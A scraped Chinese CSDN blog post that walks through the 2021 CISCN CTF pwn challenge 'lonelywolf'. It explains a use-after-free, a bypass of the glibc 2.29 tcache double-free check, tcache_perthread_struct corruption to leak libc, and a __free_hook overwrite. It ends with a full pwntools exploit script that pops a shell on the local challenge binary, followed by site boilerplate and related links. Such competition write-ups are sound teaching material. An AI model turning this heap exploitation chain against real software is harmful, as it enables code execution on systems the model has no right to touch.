2021 ciscn 线上 pwn lonelywolf

最新推荐文章于 2022-10-02 20:28:46 发布
最新推荐文章于 2022-10-02 20:28:46 发布
阅读量255 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119541556
版权

在这里插入图片描述
显然是全开。

add
在这里插入图片描述只能控制一个chunk,size也有限制。

edit
在这里插入图片描述以回车结束。
这里有一个off by null。

show
在这里插入图片描述就输出。

free
在这里插入图片描述
有个uaf。

整个看下来,那个index就是那种逗你玩那种。
然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。

那想想怎么来利用那个uaf。
uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。
但问题就是怎么来得到libc的地址。

现在的情况是有输出函数,但是chunk的大小收到了限制。
我们只能去攻击tcache头
也就是
在这里插入图片描述也就是tcache_perthread_struct,我们直接先攻击他,然后对他进行污染,也就是把counts数组中对0x250chunk的count改的比较大,因为tcache头大小就是0x250.
然后直接free掉,就可以泄露libc地址。

那么问题来了,我们还是要去用double free的,因为它只能利用一个chunk。

libc是2.29,我们还要去做一下bypass。

libc2.29是怎样去限制double free的,他会在bk的位置去加一个key值,free的时候如果这个地方是这个值,就会检查链表中是否已经有了这个chunk。这个值是个啥?

在这里插入图片描述
也就是我们的tcache头的内容部分的地址。
我们只要把他改掉就好了,那么我们的思路就非常清晰了。

绕过libc2.29对double free的检查,对tcache头进行污染,然后泄露libc地址,攻击free_hook就可以了。

要注意一个小细节,在我们攻击tcache头的时候,一定要保证链表空空,不然会导致链表中出现tcacahe fd的值,导致一会malloc错误。

在这里插入图片描述

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level = "debug"

r = process("./lonelywolf")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.29-0ubuntu2_amd64/libc.so.6")

def allocate(size):
    r.sendlineafter("Your choice: ", "1")
    r.sendlineafter("Index: ", "0")
    r.sendlineafter("Size: ", str(size))

def edit(content):
    r.sendlineafter("Your choice: ", "2")
    r.sendlineafter("Index: ", "0")
    r.sendlineafter("Content: ", content)

def show():
    r.sendlineafter("Your choice: ", "3")
    r.sendlineafter("Index: ", "0")

def delete():
    r.sendlineafter("Your choice: ", "4")
    r.sendlineafter("Index: ", "0")
    

allocate(0x78)
delete()
edit('a' * 0x10)
delete()
allocate(0x78) #为了让链表清空,防止一会malloc出错
show()
r.recvuntil("Content: ")
heap_addr = u64(r.recv(6) + '\x00\x00') & 0xfffffffffffff000
print "heap_addr = " + hex(heap_addr)

edit(p64(heap_addr+0x10))
allocate(0x78)
allocate(0x78)
edit('a' * 64)
delete()

show()
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

gdb.attach(r)

allocate(0x78)
delete()
edit(p64(free_hook))
allocate(0x78)
allocate(0x78)
edit(p64(system_addr))

allocate(0x30)
edit("/bin/sh\x00")
delete()

r.interactive()
yongbaoii
关注
专栏目录
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 454
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2286
2022 CISCN 初赛pwn的完整wp
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 889
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
2021-ciscn-pwn-lonlywolf复现
weixin_45209963的博客
06-06 630
Lonlywolf 国赛题难度可以…先爬了 做的复现… 这里使用的exp是nuoye大佬的版本 先膜一波 主函数没什么特殊的 add/del/print/edit都有 add要求小于0x78(120),而且只保存了当前拿到的chunk地址 free有典型的UAF edit正常 没有off by null 遇’\n’停止。 print也正常。 下面来说说做法 这题麻烦的是手里只有一个地址 leak完了不方便攻击 直接攻击又没有地址 nuoye大佬的做法是tcache perthread corrup
ciscn2021 pwn-lonelywolf
z1r0的博客
05-19 232
ciscn2021 pwn-lonelywolf 简单题 保护全开 有一个很明显的uaf漏洞 add还限制了大小 攻击思路:利用tcache struct attack来解决这一道题目,申请到tcache struct这里之后有两种方法来得到unsortedbin的块。 第一种是对struct进行绕过并释放,第二种是将申请的堆块伪造成0x91并释放。这里选择第二种。 因为tcache第一个bin满7个接下来就会fastbin或者进入其他的bin。所以我们改里面的0x91对应的counts为7,再利用ua
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 760
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
CISCN2021pwn lonelywolf(uaf,控制0x250tcache头)
m0_51251108的博客
10-02 208
复现CISCN2021pwn lonelywolf
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1519
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
hello_pwn [XCTF-PWN]CTF writeup系列4
重新启程
12-19 659
题目:hello_pwn 先看下题目 照例,检查一下保护情况,反编译程序 root@mypwn:/ctf/work/python# checksec c0a6dfb32cc7488a939d8c537530174d [*] '/ctf/work/python/c0a6dfb32cc7488a939d8c537530174d' Arch: amd64-64-little...
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1201
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1390
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
BUUCTF刷题2
m0_51251108的博客
05-22 595
gyctf_2020_borrowstack: 关键词:栈迁移 使用可控制的地址覆盖ebp的值,使用leave;ret指令所在地址覆盖ret的值,迁移后要填充4或8 read的时候用send 这题首先注意: 1.bss段离plt,got很近,要适当抬高迁移的位置 3.用system拿,估计还得要栈迁移,麻烦,用og简单, from pwn import* r=remote('node3.buuoj.cn',26005) #r=process('./gyctf_2020_borrowstack') conte
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 869
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
off-by-null-b00ks
csdn546229768的博客
01-16 380
题目: asisctf2016_b00ks 保护 除了canary全开,因为是堆题,所以基本可以认为保护措施全开 分析 主函数 程序封装的read函数 add函数 由add函数可得出以下结构示意图: dele函数 edit函数 show函数 init_name函数 重命名的bss段 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3pp7b6E3-1642340360854)(off-by-null.assets/image-2022011620005682
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值